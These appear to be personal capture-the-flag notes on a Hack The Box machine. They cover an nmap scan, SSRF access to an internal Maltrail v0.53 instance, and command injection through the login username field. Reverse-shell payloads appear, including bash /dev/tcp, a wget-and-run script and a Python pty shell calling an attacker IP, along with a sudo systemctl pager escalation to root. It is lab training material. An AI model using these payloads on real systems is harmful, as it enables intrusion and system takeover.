use proxy function to access internal ports as found from nmap scan:

map -vv -p- -T4 -Pn -oA fastscan_external 10.10.11.224 
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-30 18:28 CEST
Initiating Parallel DNS resolution of 1 host. at 18:28
Completed Parallel DNS resolution of 1 host. at 18:28, 0.00s elapsed
Initiating Connect Scan at 18:28
Scanning 10.10.11.224 (10.10.11.224) [65535 ports]
Discovered open port 22/tcp on 10.10.11.224
Discovered open port 55555/tcp on 10.10.11.224
Completed Connect Scan at 18:28, 13.87s elapsed (65535 total ports)
Nmap scan report for 10.10.11.224 (10.10.11.224)
Host is up, received user-set (0.056s latency).
Scanned at 2023-07-30 18:28:23 CEST for 14s
Not shown: 65531 closed tcp ports (conn-refused)
PORT      STATE    SERVICE REASON
22/tcp    open     ssh     syn-ack
80/tcp    filtered http    no-response
8338/tcp  filtered unknown no-response
55555/tcp open     unknown syn-ack


probably 80 and 8338 are accessible only from localhost


80 ---> maltrail
8338 -> maltrail

Powered by Maltrail (v0.53)

https://github.com/spookier/Maltrail-v0.53-Exploit


Maltrail ha RCE

https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/

curl 'http://hostname:8338/login' --data 'username=;`id > /tmp/bbq`'


forward url:

http://127.0.0.1:8338/login


payload curl:


curl 'http://10.10.11.224:55555/zjpp9ts' --data 'username=;`ping -c 3 10.10.14.7`'


funziona

 sudo tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
18:40:02.409028 IP 10.10.11.224 > 10.10.14.7: ICMP echo request, id 2, seq 1, length 64
18:40:02.409266 IP 10.10.14.7 > 10.10.11.224: ICMP echo reply, id 2, seq 1, length 64
18:40:03.367614 IP 10.10.11.224 > 10.10.14.7: ICMP echo request, id 2, seq 2, length 64
18:40:03.367720 IP 10.10.14.7 > 10.10.11.224: ICMP echo reply, id 2, seq 2, length 64
18:40:04.368108 IP 10.10.11.224 > 10.10.14.7: ICMP echo request, id 2, seq 3, length 64
18:40:04.368221 IP 10.10.14.7 > 10.10.11.224: ICMP echo reply, id 2, seq 3, length 64



curl 'http://10.10.11.224:55555/zjpp9ts' --data 'username=;`/bin/bash -i >& /dev/tcp/10.10.14.7/4444 0>&1`'




┌──(kali㉿kali)-[~/…/ctfs-writeups/htb/done/sau]
└─$ curl 'http://10.10.11.224:55555/zjpp9ts' --data 'username=;`wget http://10.10.14.7:8000/rev.sh -O /tmp/rev3.sh`' 
Login failed                                                                                                                                                                                                                  
┌──(kali㉿kali)-[~/…/ctfs-writeups/htb/done/sau]
└─$ curl 'http://10.10.11.224:55555/zjpp9ts' --data 'username=;`chmod 777 /tmp/rev3.sh`'                            
Login failed                                                                                                                                                                                                                  
┌──(kali㉿kali)-[~/…/ctfs-writeups/htb/done/sau]
└─$ curl 'http://10.10.11.224:55555/zjpp9ts' --data 'username=;`bash /tmp/rev3.sh`' 





whoami
puma
pwd
/opt/maltrail
cd /home/puma
ls
user.txt
cat user.txt
20c50b91524bcab3fab9de19f4bdac86




puma@sau:/opt/maltrail$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin                                                                                                                                                                  
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin                                                                                                                                 
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin                                                                                                                                                        
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin                                                                                                                            
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin                                                                                                                                      
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin                                                                                                                         
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin                                                                                                                                                              
syslog:x:104:110::/home/syslog:/usr/sbin/nologin                                                                                                                                                                  
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin                                                                                                                                                                  
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false                                                                                                                                                       
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin                                                                                                                                                                     
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin                                                                                                                                                                 
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin                                                                                                                                                                     
landscape:x:110:115::/var/lib/landscape:/usr/sbin/nologin                                                                                                                                                         
pollinate:x:111:1::/var/cache/pollinate:/bin/false                                                                                                                                                                
fwupd-refresh:x:112:116:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin                                                                                                                                      
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin                                                                                                                                                
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
puma:x:1001:1001::/home/puma:/bin/bash
_laurel:x:997:997::/var/log/laurel:/bin/false







puma@sau:/opt/maltrail$ sudo -l
sudo -l
Matching Defaults entries for puma on sau:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User puma may run the following commands on sau:
    (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service



https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-systemctl-privilege-escalation/


per fare la cosa del pager con !sh forse ho bisogno di una shell interattiva al 100% quindi genero chiave ssh, la metto nella dir .ssh di puma e accedo con ssh

continua a non funzionare, non me lo apre con less a quanto pare 


alla fine ha funzionato provando varie shell
lanciandole dalla sessione ssh su nc 

quella che ha funzionato:

export RHOST="10.10.14.7";export RPORT=9999;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'




nc -lvnp 9999                                                                   
listening on [any] 9999 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.11.224] 51110
$ sudo -l
sudo -l
Matching Defaults entries for puma on sau:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User puma may run the following commands on sau:
    (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service
$ sudo /usr/bin/systemctl status trail.service
sudo /usr/bin/systemctl status trail.service
● trail.service - Maltrail. Server of malicious traffic detection system
     Loaded: loaded (/etc/systemd/system/trail.service; enabled; vendor preset:>
     Active: active (running) since Sun 2023-07-30 15:46:09 UTC; 1h 28min ago
       Docs: https://github.com/stamparm/maltrail#readme
             https://github.com/stamparm/maltrail/wiki
   Main PID: 893 (python3)
      Tasks: 5 (limit: 4662)
     Memory: 298.9M
     CGroup: /system.slice/trail.service
             ├─ 893 /usr/bin/python3 server.py
             ├─1296 /bin/sh -c logger -p auth.info -t "maltrail[893]" "Failed p>
             ├─1297 bash /tmp/rev4.sh
             └─1298 /bin/bash -i

Jul 30 16:53:10 sau maltrail[1286]: Failed password for ; from 127.0.0.1 port 5>
Jul 30 16:53:35 sau maltrail[1294]: Failed password for ; from 127.0.0.1 port 4>
Jul 30 16:54:43 sau sudo[1312]:     puma : TTY=unknown ; PWD=/opt/maltrail ; US>
Jul 30 16:55:28 sau sudo[1314]:     puma : TTY=unknown ; PWD=/opt/maltrail ; US>
Jul 30 16:55:28 sau sudo[1314]: pam_unix(sudo:session): session opened for user>
Jul 30 16:55:28 sau sudo[1314]: pam_unix(sudo:session): session closed for user>
Jul 30 17:01:41 sau sudo[1352]:     puma : TTY=unknown ; PWD=/opt/maltrail ; US>
Jul 30 17:03:28 sau sudo[1355]:     puma : TTY=unknown ; PWD=/opt/maltrail ; US>
Jul 30 17:03:28 sau sudo[1355]: pam_unix(sudo:session): session opened for user>
lines 1-23!sh
!sh
# whoami && cat /root/root.txt
whoami && cat /root/root.txt
root
9310dcd7a5012def2a5ce296706d4a9c
